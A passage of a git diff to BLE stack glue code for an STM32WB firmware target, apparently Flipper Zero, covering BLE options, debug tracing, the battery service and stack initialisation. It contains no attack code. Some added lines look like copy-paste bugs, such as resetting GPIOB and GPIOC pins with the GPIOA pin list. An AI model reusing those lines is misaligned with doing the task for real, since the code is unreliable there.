Set to 0 ++ * SMPS used when Set to 1 ++ */ ++#define CFG_USE_SMPS 1 ++/* USER CODE END Generic_Parameters */ ++ ++/**< specific parameters */ ++/*****************************************************/ ++ ++/** ++* AD Element - Group B Feature ++*/ ++/* LSB - Second Byte */ ++#define CFG_FEATURE_OTA_REBOOT (0x20) ++ + /****************************************************************************** + * BLE Stack + ******************************************************************************/ +@@ -119,9 +203,7 @@ + * 1 : external high speed crystal HSE/32/32 + * 0 : external low speed crystal ( no calibration ) + */ +-#define CFG_BLE_LSE_SOURCE \ +- SHCI_C2_BLE_INIT_CFG_BLE_LS_CLK_LSE | SHCI_C2_BLE_INIT_CFG_BLE_LS_OTHER_DEV | \ +- SHCI_C2_BLE_INIT_CFG_BLE_LS_CALIB ++#define CFG_BLE_LSE_SOURCE 0 + + /** + * Start up time of the high speed (16 or 32 MHz) crystal oscillator in units of 625/256 us (~2.44 us) +@@ -171,8 +253,8 @@ + */ + #define CFG_BLE_OPTIONS \ + (SHCI_C2_BLE_INIT_OPTIONS_LL_HOST | SHCI_C2_BLE_INIT_OPTIONS_WITH_SVC_CHANGE_DESC | \ +- SHCI_C2_BLE_INIT_OPTIONS_DEVICE_NAME_RO | SHCI_C2_BLE_INIT_OPTIONS_EXT_ADV | \ +- SHCI_C2_BLE_INIT_OPTIONS_CS_ALGO2 | SHCI_C2_BLE_INIT_OPTIONS_POWER_CLASS_2_3) ++ SHCI_C2_BLE_INIT_OPTIONS_DEVICE_NAME_RW | SHCI_C2_BLE_INIT_OPTIONS_NO_EXT_ADV | \ ++ SHCI_C2_BLE_INIT_OPTIONS_NO_CS_ALGO2 | SHCI_C2_BLE_INIT_OPTIONS_POWER_CLASS_2_3) + + /** + * Queue length of BLE Event +@@ -200,3 +282,187 @@ + 255 /**< Set to 255 with the memory manager and the mailbox */ + + #define TL_BLE_EVENT_FRAME_SIZE (TL_EVT_HDR_SIZE + CFG_TLBLE_MOST_EVENT_PAYLOAD_SIZE) ++/****************************************************************************** ++ * UART interfaces ++ ******************************************************************************/ ++ ++/** ++ * Select UART interfaces ++ */ ++#define CFG_DEBUG_TRACE_UART hw_uart1 ++#define CFG_CONSOLE_MENU 0 ++ ++/****************************************************************************** ++ * Low Power ++ ******************************************************************************/ ++/** ++ * When set to 1, the low power mode is enable ++ * When set to 0, the device stays in RUN mode ++ */ ++#define CFG_LPM_SUPPORTED 1 ++ ++/****************************************************************************** ++ * Timer Server ++ ******************************************************************************/ ++/** ++ * CFG_RTC_WUCKSEL_DIVIDER: This sets the RTCCLK divider to the wakeup timer. ++ * The lower is the value, the better is the power consumption and the accuracy of the timerserver ++ * The higher is the value, the finest is the granularity ++ * ++ * CFG_RTC_ASYNCH_PRESCALER: This sets the asynchronous prescaler of the RTC. It should as high as possible ( to ouput ++ * clock as low as possible) but the output clock should be equal or higher frequency compare to the clock feeding ++ * the wakeup timer. A lower clock speed would impact the accuracy of the timer server. ++ * ++ * CFG_RTC_SYNCH_PRESCALER: This sets the synchronous prescaler of the RTC. ++ * When the 1Hz calendar clock is required, it shall be sets according to other settings ++ * When the 1Hz calendar clock is not needed, CFG_RTC_SYNCH_PRESCALER should be set to 0x7FFF (MAX VALUE) ++ * ++ * CFG_RTCCLK_DIVIDER_CONF: ++ * Shall be set to either 0,2,4,8,16 ++ * When set to either 2,4,8,16, the 1Hhz calendar is supported ++ * When set to 0, the user sets its own configuration ++ * ++ * The following settings are computed with LSI as input to the RTC ++ */ ++#define CFG_RTCCLK_DIVIDER_CONF 0 ++ ++#if(CFG_RTCCLK_DIVIDER_CONF == 0) ++/** ++ * Custom configuration ++ * It does not support 1Hz calendar ++ * It divides the RTC CLK by 16 ++ */ ++#define CFG_RTCCLK_DIV (16) ++#define CFG_RTC_WUCKSEL_DIVIDER (0) ++#define CFG_RTC_ASYNCH_PRESCALER (CFG_RTCCLK_DIV - 1) ++#define CFG_RTC_SYNCH_PRESCALER (0x7FFF) ++ ++#else ++ ++#if(CFG_RTCCLK_DIVIDER_CONF == 2) ++/** ++ * It divides the RTC CLK by 2 ++ */ ++#define CFG_RTC_WUCKSEL_DIVIDER (3) ++#endif ++ ++#if(CFG_RTCCLK_DIVIDER_CONF == 4) ++/** ++ * It divides the RTC CLK by 4 ++ */ ++#define CFG_RTC_WUCKSEL_DIVIDER (2) ++#endif ++ ++#if(CFG_RTCCLK_DIVIDER_CONF == 8) ++/** ++ * It divides the RTC CLK by 8 ++ */ ++#define CFG_RTC_WUCKSEL_DIVIDER (1) ++#endif ++ ++#if(CFG_RTCCLK_DIVIDER_CONF == 16) ++/** ++ * It divides the RTC CLK by 16 ++ */ ++#define CFG_RTC_WUCKSEL_DIVIDER (0) ++#endif ++ ++#define CFG_RTCCLK_DIV CFG_RTCCLK_DIVIDER_CONF ++#define CFG_RTC_ASYNCH_PRESCALER (CFG_RTCCLK_DIV - 1) ++#define CFG_RTC_SYNCH_PRESCALER (DIVR(LSE_VALUE, (CFG_RTC_ASYNCH_PRESCALER + 1)) - 1) ++ ++#endif ++ ++/** tick timer value in us */ ++#define CFG_TS_TICK_VAL DIVR((CFG_RTCCLK_DIV * 1000000), LSE_VALUE) ++ ++typedef enum { ++ CFG_TIM_PROC_ID_ISR, ++ /* USER CODE BEGIN CFG_TimProcID_t */ ++ ++ /* USER CODE END CFG_TimProcID_t */ ++} CFG_TimProcID_t; ++ ++/****************************************************************************** ++ * Debug ++ ******************************************************************************/ ++/** ++ * When set, this resets some hw resources to set the device in the same state than the power up ++ * The FW resets only register that may prevent the FW to run properly ++ * ++ * This shall be set to 0 in a final product ++ * ++ */ ++#define CFG_HW_RESET_BY_FW 0 ++ ++/** ++ * keep debugger enabled while in any low power mode when set to 1 ++ * should be set to 0 in production ++ */ ++#define CFG_DEBUGGER_SUPPORTED 1 ++ ++/** ++ * When set to 1, the traces are enabled in the BLE services ++ */ ++#define CFG_DEBUG_BLE_TRACE 0 ++ ++/** ++ * Enable or Disable traces in application ++ */ ++#define CFG_DEBUG_APP_TRACE 0 ++ ++#if(CFG_DEBUG_APP_TRACE != 0) ++#define APP_DBG_MSG PRINT_MESG_DBG ++#else ++#define APP_DBG_MSG PRINT_NO_MESG ++#endif ++ ++#if((CFG_DEBUG_BLE_TRACE != 0) || (CFG_DEBUG_APP_TRACE != 0)) ++#define CFG_DEBUG_TRACE 1 ++#endif ++ ++#if(CFG_DEBUG_TRACE != 0) ++#undef CFG_LPM_SUPPORTED ++#undef CFG_DEBUGGER_SUPPORTED ++#define CFG_LPM_SUPPORTED 0 ++#define CFG_DEBUGGER_SUPPORTED 1 ++#endif ++ ++/** ++ * When CFG_DEBUG_TRACE_FULL is set to 1, the trace are output with the API name, the file name and the line number ++ * When CFG_DEBUG_TRACE_LIGHT is set to 1, only the debug message is output ++ * ++ * When both are set to 0, no trace are output ++ * When both are set to 1, CFG_DEBUG_TRACE_FULL is selected ++ */ ++#define CFG_DEBUG_TRACE_LIGHT 0 ++#define CFG_DEBUG_TRACE_FULL 0 ++ ++#if((CFG_DEBUG_TRACE != 0) && (CFG_DEBUG_TRACE_LIGHT == 0) && (CFG_DEBUG_TRACE_FULL == 0)) ++#undef CFG_DEBUG_TRACE_FULL ++#undef CFG_DEBUG_TRACE_LIGHT ++#define CFG_DEBUG_TRACE_FULL 0 ++#define CFG_DEBUG_TRACE_LIGHT 1 ++#endif ++ ++#if(CFG_DEBUG_TRACE == 0) ++#undef CFG_DEBUG_TRACE_FULL ++#undef CFG_DEBUG_TRACE_LIGHT ++#define CFG_DEBUG_TRACE_FULL 0 ++#define CFG_DEBUG_TRACE_LIGHT 0 ++#endif ++ ++/** ++ * When not set, the traces is looping on sending the trace over UART ++ */ ++#define DBG_TRACE_USE_CIRCULAR_QUEUE 0 ++ ++/** ++ * max buffer Size to queue data traces and max data trace allowed. ++ * Only Used if DBG_TRACE_USE_CIRCULAR_QUEUE is defined ++ */ ++#define DBG_TRACE_MSG_QUEUE_SIZE 4096 ++#define MAX_DBG_TRACE_MSG_SIZE 1024 ++ ++#define CFG_OTP_BASE_ADDRESS OTP_AREA_BASE ++#define CFG_OTP_END_ADRESS OTP_AREA_END_ADDR +diff --git a/firmware/targets/f7/ble_glue/app_debug.c b/firmware/targets/f7/ble_glue/app_debug.c +index fe76687b9..b443bee21 100644 +--- a/firmware/targets/f7/ble_glue/app_debug.c ++++ b/firmware/targets/f7/ble_glue/app_debug.c +@@ -6,9 +6,6 @@ + #include + #include + +-#include "stm32wbxx_ll_bus.h" +-#include "stm32wbxx_ll_pwr.h" +- + #include + + typedef PACKED_STRUCT { +@@ -111,6 +108,10 @@ static void APPD_SetCPU2GpioConfig(void); + static void APPD_BleDtbCfg(void); + + void APPD_Init() { ++#if(CFG_DEBUG_TRACE != 0) ++ DbgTraceInit(); ++#endif ++ + APPD_SetCPU2GpioConfig(); + APPD_BleDtbCfg(); + } +@@ -195,14 +196,14 @@ static void APPD_SetCPU2GpioConfig(void) { + gpio_config.Pin = gpiob_pin_list; + LL_C2_AHB2_GRP1_EnableClock(LL_C2_AHB2_GRP1_PERIPH_GPIOB); + LL_GPIO_Init(GPIOB, &gpio_config); +- LL_GPIO_ResetOutputPin(GPIOB, gpiob_pin_list); ++ LL_GPIO_ResetOutputPin(GPIOB, gpioa_pin_list); + } + + if(gpioc_pin_list != 0) { + gpio_config.Pin = gpioc_pin_list; + LL_C2_AHB2_GRP1_EnableClock(LL_C2_AHB2_GRP1_PERIPH_GPIOC); + LL_GPIO_Init(GPIOC, &gpio_config); +- LL_GPIO_ResetOutputPin(GPIOC, gpioc_pin_list); ++ LL_GPIO_ResetOutputPin(GPIOC, gpioa_pin_list); + } + } + +@@ -251,3 +252,13 @@ static void APPD_BleDtbCfg(void) { + } + #endif + } ++ ++#if(CFG_DEBUG_TRACE != 0) ++void DbgOutputInit(void) { ++} ++ ++void DbgOutputTraces(uint8_t* p_data, uint16_t size, void (*cb)(void)) { ++ furi_hal_console_tx(p_data, size); ++ cb(); ++} ++#endif +diff --git a/firmware/targets/f7/ble_glue/app_debug.h b/firmware/targets/f7/ble_glue/app_debug.h +index 213470bed..92a54d75b 100644 +--- a/firmware/targets/f7/ble_glue/app_debug.h ++++ b/firmware/targets/f7/ble_glue/app_debug.h +@@ -1,4 +1,26 @@ +-#pragma once ++/* USER CODE BEGIN Header */ ++/** ++ ****************************************************************************** ++ * File Name : app_debug.h ++ * Description : Header for app_debug.c module ++ ****************************************************************************** ++ * @attention ++ * ++ *

© Copyright (c) 2020 STMicroelectronics. ++ * All rights reserved.

++ * ++ * This software component is licensed by ST under Ultimate Liberty license ++ * SLA0044, the "License"; You may not use this file except in compliance with ++ * the License. You may obtain a copy of the License at: ++ * www.st.com/SLA0044 ++ * ++ ****************************************************************************** ++ */ ++/* USER CODE END Header */ ++ ++/* Define to prevent recursive inclusion -------------------------------------*/ ++#ifndef __APP_DEBUG_H ++#define __APP_DEBUG_H + + #ifdef __cplusplus + extern "C" { +@@ -10,3 +32,7 @@ void APPD_EnableCPU2(void); + #ifdef __cplusplus + } + #endif ++ ++#endif /*__APP_DEBUG_H */ ++ ++/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ +diff --git a/firmware/targets/f7/ble_glue/services/battery_service.c b/firmware/targets/f7/ble_glue/battery_service.c +similarity index 53% +rename from firmware/targets/f7/ble_glue/services/battery_service.c +rename to firmware/targets/f7/ble_glue/battery_service.c +index 63f736b3b..8c371efad 100644 +--- a/firmware/targets/f7/ble_glue/services/battery_service.c ++++ b/firmware/targets/f7/ble_glue/battery_service.c +@@ -1,7 +1,5 @@ + #include "battery_service.h" + #include "app_common.h" +-#include "gatt_char.h" +- + #include + + #include +@@ -9,6 +7,12 @@ + + #define TAG "BtBatterySvc" + ++typedef struct { ++ uint16_t svc_handle; ++ uint16_t battery_level_char_handle; ++ uint16_t power_state_char_handle; ++} BatterySvc; ++ + enum { + // Common states + BatterySvcPowerStateUnknown = 0b00, +@@ -36,44 +40,13 @@ typedef struct { + + _Static_assert(sizeof(BattrySvcPowerState) == 1, "Incorrect structure size"); + ++static BatterySvc* battery_svc = NULL; ++ + #define BATTERY_POWER_STATE (0x2A1A) + + static const uint16_t service_uuid = BATTERY_SERVICE_UUID; +- +-typedef enum { +- BatterySvcGattCharacteristicBatteryLevel = 0, +- BatterySvcGattCharacteristicPowerState, +- BatterySvcGattCharacteristicCount, +-} BatterySvcGattCharacteristicId; +- +-static const FlipperGattCharacteristicParams battery_svc_chars[BatterySvcGattCharacteristicCount] = +- {[BatterySvcGattCharacteristicBatteryLevel] = +- {.name = "Battery Level", +- .data_prop_type = FlipperGattCharacteristicDataFixed, +- .data.fixed.length = 1, +- .uuid.Char_UUID_16 = BATTERY_LEVEL_CHAR_UUID, +- .uuid_type = UUID_TYPE_16, +- .char_properties = CHAR_PROP_READ | CHAR_PROP_NOTIFY, +- .security_permissions = ATTR_PERMISSION_AUTHEN_READ, +- .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, +- .is_variable = CHAR_VALUE_LEN_CONSTANT}, +- [BatterySvcGattCharacteristicPowerState] = { +- .name = "Power State", +- .data_prop_type = FlipperGattCharacteristicDataFixed, +- .data.fixed.length = 1, +- .uuid.Char_UUID_16 = BATTERY_POWER_STATE, +- .uuid_type = UUID_TYPE_16, +- .char_properties = CHAR_PROP_READ | CHAR_PROP_NOTIFY, +- .security_permissions = ATTR_PERMISSION_AUTHEN_READ, +- .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, +- .is_variable = CHAR_VALUE_LEN_CONSTANT}}; +- +-typedef struct { +- uint16_t svc_handle; +- FlipperGattCharacteristicInstance chars[BatterySvcGattCharacteristicCount]; +-} BatterySvc; +- +-static BatterySvc* battery_svc = NULL; ++static const uint16_t battery_level_char_uuid = BATTERY_LEVEL_CHAR_UUID; ++static const uint16_t power_state_char_uuid = BATTERY_POWER_STATE; + + void battery_svc_start() { + battery_svc = malloc(sizeof(BatterySvc)); +@@ -85,19 +58,53 @@ void battery_svc_start() { + if(status) { + FURI_LOG_E(TAG, "Failed to add Battery service: %d", status); + } +- for(size_t i = 0; i < BatterySvcGattCharacteristicCount; i++) { +- flipper_gatt_characteristic_init( +- battery_svc->svc_handle, &battery_svc_chars[i], &battery_svc->chars[i]); ++ // Add Battery level characteristic ++ status = aci_gatt_add_char( ++ battery_svc->svc_handle, ++ UUID_TYPE_16, ++ (Char_UUID_t*)&battery_level_char_uuid, ++ 1, ++ CHAR_PROP_READ | CHAR_PROP_NOTIFY, ++ ATTR_PERMISSION_AUTHEN_READ, ++ GATT_DONT_NOTIFY_EVENTS, ++ 10, ++ CHAR_VALUE_LEN_CONSTANT, ++ &battery_svc->battery_level_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add Battery level characteristic: %d", status); + } +- ++ // Add Power state characteristic ++ status = aci_gatt_add_char( ++ battery_svc->svc_handle, ++ UUID_TYPE_16, ++ (Char_UUID_t*)&power_state_char_uuid, ++ 1, ++ CHAR_PROP_READ | CHAR_PROP_NOTIFY, ++ ATTR_PERMISSION_AUTHEN_READ, ++ GATT_DONT_NOTIFY_EVENTS, ++ 10, ++ CHAR_VALUE_LEN_CONSTANT, ++ &battery_svc->power_state_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add Battery level characteristic: %d", status); ++ } ++ // Update power state charachteristic + battery_svc_update_power_state(); + } + + void battery_svc_stop() { + tBleStatus status; + if(battery_svc) { +- for(size_t i = 0; i < BatterySvcGattCharacteristicCount; i++) { +- flipper_gatt_characteristic_delete(battery_svc->svc_handle, &battery_svc->chars[i]); ++ // Delete Battery level characteristic ++ status = ++ aci_gatt_del_char(battery_svc->svc_handle, battery_svc->battery_level_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete Battery level characteristic: %d", status); ++ } ++ // Delete Power state characteristic ++ status = aci_gatt_del_char(battery_svc->svc_handle, battery_svc->power_state_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete Battery level characteristic: %d", status); + } + // Delete Battery service + status = aci_gatt_del_service(battery_svc->svc_handle); +@@ -119,10 +126,13 @@ bool battery_svc_update_level(uint8_t battery_charge) { + return false; + } + // Update battery level characteristic +- return flipper_gatt_characteristic_update( +- battery_svc->svc_handle, +- &battery_svc->chars[BatterySvcGattCharacteristicBatteryLevel], +- &battery_charge); ++ FURI_LOG_D(TAG, "Updating battery level characteristic"); ++ tBleStatus result = aci_gatt_update_char_value( ++ battery_svc->svc_handle, battery_svc->battery_level_char_handle, 0, 1, &battery_charge); ++ if(result) { ++ FURI_LOG_E(TAG, "Failed updating RX characteristic: %d", result); ++ } ++ return result != BLE_STATUS_SUCCESS; + } + + bool battery_svc_update_power_state() { +@@ -142,9 +152,15 @@ bool battery_svc_update_power_state() { + power_state.charging = BatterySvcPowerStateNotCharging; + power_state.discharging = BatterySvcPowerStateDischarging; + } +- +- return flipper_gatt_characteristic_update( ++ FURI_LOG_D(TAG, "Updating power state characteristic"); ++ tBleStatus result = aci_gatt_update_char_value( + battery_svc->svc_handle, +- &battery_svc->chars[BatterySvcGattCharacteristicPowerState], +- &power_state); ++ battery_svc->power_state_char_handle, ++ 0, ++ 1, ++ (uint8_t*)&power_state); ++ if(result) { ++ FURI_LOG_E(TAG, "Failed updating Power state characteristic: %d", result); ++ } ++ return result != BLE_STATUS_SUCCESS; + } +diff --git a/firmware/targets/f7/ble_glue/services/battery_service.h b/firmware/targets/f7/ble_glue/battery_service.h +similarity index 100% +rename from firmware/targets/f7/ble_glue/services/battery_service.h +rename to firmware/targets/f7/ble_glue/battery_service.h +diff --git a/firmware/targets/f7/ble_glue/ble_app.c b/firmware/targets/f7/ble_glue/ble_app.c +index 37ec3d0b9..ed62b1884 100644 +--- a/firmware/targets/f7/ble_glue/ble_app.c ++++ b/firmware/targets/f7/ble_glue/ble_app.c +@@ -18,8 +18,8 @@ PLACE_IN_SECTION("MB_MEM1") ALIGN(4) static TL_CmdPacket_t ble_app_cmd_buffer; + PLACE_IN_SECTION("MB_MEM2") ALIGN(4) static uint32_t ble_app_nvm[BLE_NVM_SRAM_SIZE]; + + _Static_assert( +- sizeof(SHCI_C2_Ble_Init_Cmd_Packet_t) == 58, +- "Ble stack config structure size mismatch (check new config options - last updated for v.1.17.2)"); ++ sizeof(SHCI_C2_Ble_Init_Cmd_Packet_t) == 57, ++ "Ble stack config structure size mismatch (check new config options - last updated for v.1.15.0)"); + + typedef struct { + FuriMutex* hci_mtx; +@@ -33,54 +33,6 @@ static int32_t ble_app_hci_thread(void* context); + static void ble_app_hci_event_handler(void* pPayload); + static void ble_app_hci_status_not_handler(HCI_TL_CmdStatus_t status); + +-static const HCI_TL_HciInitConf_t hci_tl_config = { +- .p_cmdbuffer = (uint8_t*)&ble_app_cmd_buffer, +- .StatusNotCallBack = ble_app_hci_status_not_handler, +-}; +- +-static const SHCI_C2_CONFIG_Cmd_Param_t config_param = { +- .PayloadCmdSize = SHCI_C2_CONFIG_PAYLOAD_CMD_SIZE, +- .Config1 = SHCI_C2_CONFIG_CONFIG1_BIT0_BLE_NVM_DATA_TO_SRAM, +- .BleNvmRamAddress = (uint32_t)ble_app_nvm, +- .EvtMask1 = SHCI_C2_CONFIG_EVTMASK1_BIT1_BLE_NVM_RAM_UPDATE_ENABLE, +-}; +- +-static const SHCI_C2_Ble_Init_Cmd_Packet_t ble_init_cmd_packet = { +- .Header = {{0, 0, 0}}, // Header unused +- .Param = { +- .pBleBufferAddress = 0, // pBleBufferAddress not used +- .BleBufferSize = 0, // BleBufferSize not used +- .NumAttrRecord = CFG_BLE_NUM_GATT_ATTRIBUTES, +- .NumAttrServ = CFG_BLE_NUM_GATT_SERVICES, +- .AttrValueArrSize = CFG_BLE_ATT_VALUE_ARRAY_SIZE, +- .NumOfLinks = CFG_BLE_NUM_LINK, +- .ExtendedPacketLengthEnable = CFG_BLE_DATA_LENGTH_EXTENSION, +- .PrWriteListSize = CFG_BLE_PREPARE_WRITE_LIST_SIZE, +- .MblockCount = CFG_BLE_MBLOCK_COUNT, +- .AttMtu = CFG_BLE_MAX_ATT_MTU, +- .SlaveSca = CFG_BLE_SLAVE_SCA, +- .MasterSca = CFG_BLE_MASTER_SCA, +- .LsSource = CFG_BLE_LSE_SOURCE, +- .MaxConnEventLength = CFG_BLE_MAX_CONN_EVENT_LENGTH, +- .HsStartupTime = CFG_BLE_HSE_STARTUP_TIME, +- .ViterbiEnable = CFG_BLE_VITERBI_MODE, +- .Options = CFG_BLE_OPTIONS, +- .HwVersion = 0, +- .max_coc_initiator_nbr = 32, +- .min_tx_power = 0, +- .max_tx_power = 0, +- .rx_model_config = 1, +- /* New stack (13.3->15.0) */ +- .max_adv_set_nbr = 1, // Only used if SHCI_C2_BLE_INIT_OPTIONS_EXT_ADV is set +- .max_adv_data_len = 1650, // Only used if SHCI_C2_BLE_INIT_OPTIONS_EXT_ADV is set +- .tx_path_compens = 0, // RF TX Path Compensation, * 0.1 dB +- .rx_path_compens = 0, // RF RX Path Compensation, * 0.1 dB +- .ble_core_version = SHCI_C2_BLE_INIT_BLE_CORE_5_4, +- /*15.0->17.0*/ +- .Options_extension = SHCI_C2_BLE_INIT_OPTIONS_ENHANCED_ATT_NOTSUPPORTED | +- SHCI_C2_BLE_INIT_OPTIONS_APPEARANCE_READONLY, +- }}; +- + bool ble_app_init() { + SHCI_CmdStatus_t status; + ble_app = malloc(sizeof(BleApp)); +@@ -92,16 +44,58 @@ bool ble_app_init() { + furi_thread_start(ble_app->thread); + + // Initialize Ble Transport Layer ++ HCI_TL_HciInitConf_t hci_tl_config = { ++ .p_cmdbuffer = (uint8_t*)&ble_app_cmd_buffer, ++ .StatusNotCallBack = ble_app_hci_status_not_handler, ++ }; + hci_init(ble_app_hci_event_handler, (void*)&hci_tl_config); + + // Configure NVM store for pairing data +- status = SHCI_C2_Config((SHCI_C2_CONFIG_Cmd_Param_t*)&config_param); ++ SHCI_C2_CONFIG_Cmd_Param_t config_param = { ++ .PayloadCmdSize = SHCI_C2_CONFIG_PAYLOAD_CMD_SIZE, ++ .Config1 = SHCI_C2_CONFIG_CONFIG1_BIT0_BLE_NVM_DATA_TO_SRAM, ++ .BleNvmRamAddress = (uint32_t)ble_app_nvm, ++ .EvtMask1 = SHCI_C2_CONFIG_EVTMASK1_BIT1_BLE_NVM_RAM_UPDATE_ENABLE, ++ }; ++ status = SHCI_C2_Config(&config_param); + if(status) { + FURI_LOG_E(TAG, "Failed to configure 2nd core: %d", status); + } + + // Start ble stack on 2nd core +- status = SHCI_C2_BLE_Init((SHCI_C2_Ble_Init_Cmd_Packet_t*)&ble_init_cmd_packet); ++ SHCI_C2_Ble_Init_Cmd_Packet_t ble_init_cmd_packet = { ++ .Header = {{0, 0, 0}}, // Header unused ++ .Param = { ++ .pBleBufferAddress = 0, // pBleBufferAddress not used ++ .BleBufferSize = 0, // BleBufferSize not used ++ .NumAttrRecord = CFG_BLE_NUM_GATT_ATTRIBUTES, ++ .NumAttrServ = CFG_BLE_NUM_GATT_SERVICES, ++ .AttrValueArrSize = CFG_BLE_ATT_VALUE_ARRAY_SIZE, ++ .NumOfLinks = CFG_BLE_NUM_LINK, ++ .ExtendedPacketLengthEnable = CFG_BLE_DATA_LENGTH_EXTENSION, ++ .PrWriteListSize = CFG_BLE_PREPARE_WRITE_LIST_SIZE, ++ .MblockCount = CFG_BLE_MBLOCK_COUNT, ++ .AttMtu = CFG_BLE_MAX_ATT_MTU, ++ .SlaveSca = CFG_BLE_SLAVE_SCA, ++ .MasterSca = CFG_BLE_MASTER_SCA, ++ .LsSource = CFG_BLE_LSE_SOURCE, ++ .MaxConnEventLength = CFG_BLE_MAX_CONN_EVENT_LENGTH, ++ .HsStartupTime = CFG_BLE_HSE_STARTUP_TIME, ++ .ViterbiEnable = CFG_BLE_VITERBI_MODE, ++ .Options = CFG_BLE_OPTIONS, ++ .HwVersion = 0, ++ .max_coc_initiator_nbr = 32, ++ .min_tx_power = 0, ++ .max_tx_power = 0, ++ .rx_model_config = 1, ++ /* New stack (13.3->15.0) */ ++ .max_adv_set_nbr = 1, // Only used if SHCI_C2_BLE_INIT_OPTIONS_EXT_ADV is set ++ .max_adv_data_len = 31, // Only used if SHCI_C2_BLE_INIT_OPTIONS_EXT_ADV is set ++ .tx_path_compens = 0, // RF TX Path Compensation, * 0.1 dB ++ .rx_path_compens = 0, // RF RX Path Compensation, * 0.1 dB ++ .ble_core_version = 11, // BLE Core Version: 11(5.2), 12(5.3) ++ }}; ++ status = SHCI_C2_BLE_Init(&ble_init_cmd_packet); + if(status) { + FURI_LOG_E(TAG, "Failed to start ble stack: %d", status); + } +diff --git a/firmware/targets/f7/ble_glue/ble_app.h b/firmware/targets/f7/ble_glue/ble_app.h +index 2e6babab7..495005ec4 100644 +--- a/firmware/targets/f7/ble_glue/ble_app.h ++++ b/firmware/targets/f7/ble_glue/ble_app.h +@@ -1,12 +1,12 @@ + #pragma once + +-#include +-#include +- + #ifdef __cplusplus + extern "C" { + #endif + ++#include ++#include ++ + bool ble_app_init(); + void ble_app_get_key_storage_buff(uint8_t** addr, uint16_t* size); + void ble_app_thread_stop(); +diff --git a/firmware/targets/f7/ble_glue/ble_conf.h b/firmware/targets/f7/ble_glue/ble_conf.h +index 2b9c22dfe..a04d1def1 100644 +--- a/firmware/targets/f7/ble_glue/ble_conf.h ++++ b/firmware/targets/f7/ble_glue/ble_conf.h +@@ -1,7 +1,51 @@ +-#pragma once ++/** ++ ****************************************************************************** ++ * File Name : App/ble_conf.h ++ * Description : Configuration file for BLE Middleware. ++ * ++ ****************************************************************************** ++ * @attention ++ * ++ *

© Copyright (c) 2020 STMicroelectronics. ++ * All rights reserved.

++ * ++ * This software component is licensed by ST under Ultimate Liberty license ++ * SLA0044, the "License"; You may not use this file except in compliance with ++ * the License. You may obtain a copy of the License at: ++ * www.st.com/SLA0044 ++ * ++ ****************************************************************************** ++ */ ++ ++/* Define to prevent recursive inclusion -------------------------------------*/ ++#ifndef BLE_CONF_H ++#define BLE_CONF_H + + #include "app_conf.h" + ++#ifndef __weak ++#define __weak __attribute__((weak)) ++#endif ++ ++/****************************************************************************** ++ * ++ * BLE SERVICES CONFIGURATION ++ * blesvc ++ * ++ ******************************************************************************/ ++ ++/** ++ * This setting shall be set to '1' if the device needs to support the Peripheral Role ++ * In the MS configuration, both BLE_CFG_PERIPHERAL and BLE_CFG_CENTRAL shall be set to '1' ++ */ ++#define BLE_CFG_PERIPHERAL 1 ++ ++/** ++ * This setting shall be set to '1' if the device needs to support the Central Role ++ * In the MS configuration, both BLE_CFG_PERIPHERAL and BLE_CFG_CENTRAL shall be set to '1' ++ */ ++#define BLE_CFG_CENTRAL 0 ++ + /** + * There is one handler per service enabled + * Note: There is no handler for the Device Information Service +@@ -12,3 +56,18 @@ + #define BLE_CFG_SVC_MAX_NBR_CB 7 + + #define BLE_CFG_CLT_MAX_NBR_CB 0 ++ ++/****************************************************************************** ++ * GAP Service - Apprearance ++ ******************************************************************************/ ++ ++#define BLE_CFG_UNKNOWN_APPEARANCE (0) ++#define BLE_CFG_GAP_APPEARANCE (0x0086) ++ ++/****************************************************************************** ++ * Over The Air Feature (OTA) - STM Proprietary ++ ******************************************************************************/ ++#define BLE_CFG_OTA_REBOOT_CHAR 0 /**< REBOOT OTA MODE CHARACTERISTIC */ ++ ++#endif /*BLE_CONF_H */ ++/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ +diff --git a/firmware/targets/f7/ble_glue/ble_const.h b/firmware/targets/f7/ble_glue/ble_const.h +index 1e6647d90..85f734b62 100644 +--- a/firmware/targets/f7/ble_glue/ble_const.h ++++ b/firmware/targets/f7/ble_glue/ble_const.h +@@ -1,4 +1,22 @@ +-#pragma once ++/***************************************************************************** ++ * @file ble_const.h ++ * @author MDG ++ * @brief This file contains the definitions which are compiler dependent. ++ ***************************************************************************** ++ * @attention ++ * ++ * Copyright (c) 2018-2022 STMicroelectronics. ++ * All rights reserved. ++ * ++ * This software is licensed under terms that can be found in the LICENSE file ++ * in the root directory of this software component. ++ * If no LICENSE file comes with this software, it is provided AS-IS. ++ * ++ ***************************************************************************** ++ */ ++ ++#ifndef BLE_CONST_H__ ++#define BLE_CONST_H__ + + #include + #include +@@ -97,3 +115,5 @@ extern int hci_send_req(struct hci_request* req, uint8_t async); + #ifndef MAX + #define MAX(a, b) (((a) > (b)) ? (a) : (b)) + #endif ++ ++#endif /* BLE_CONST_H__ */ +diff --git a/firmware/targets/f7/ble_glue/ble_dbg_conf.h b/firmware/targets/f7/ble_glue/ble_dbg_conf.h +index 6f70f09be..8305f8106 100644 +--- a/firmware/targets/f7/ble_glue/ble_dbg_conf.h ++++ b/firmware/targets/f7/ble_glue/ble_dbg_conf.h +@@ -1 +1,199 @@ +-#pragma once ++/** ++ ****************************************************************************** ++ * File Name : App/ble_dbg_conf.h ++ * Description : Debug configuration file for BLE Middleware. ++ * ++ ****************************************************************************** ++ * @attention ++ * ++ *

© Copyright (c) 2020 STMicroelectronics. ++ * All rights reserved.

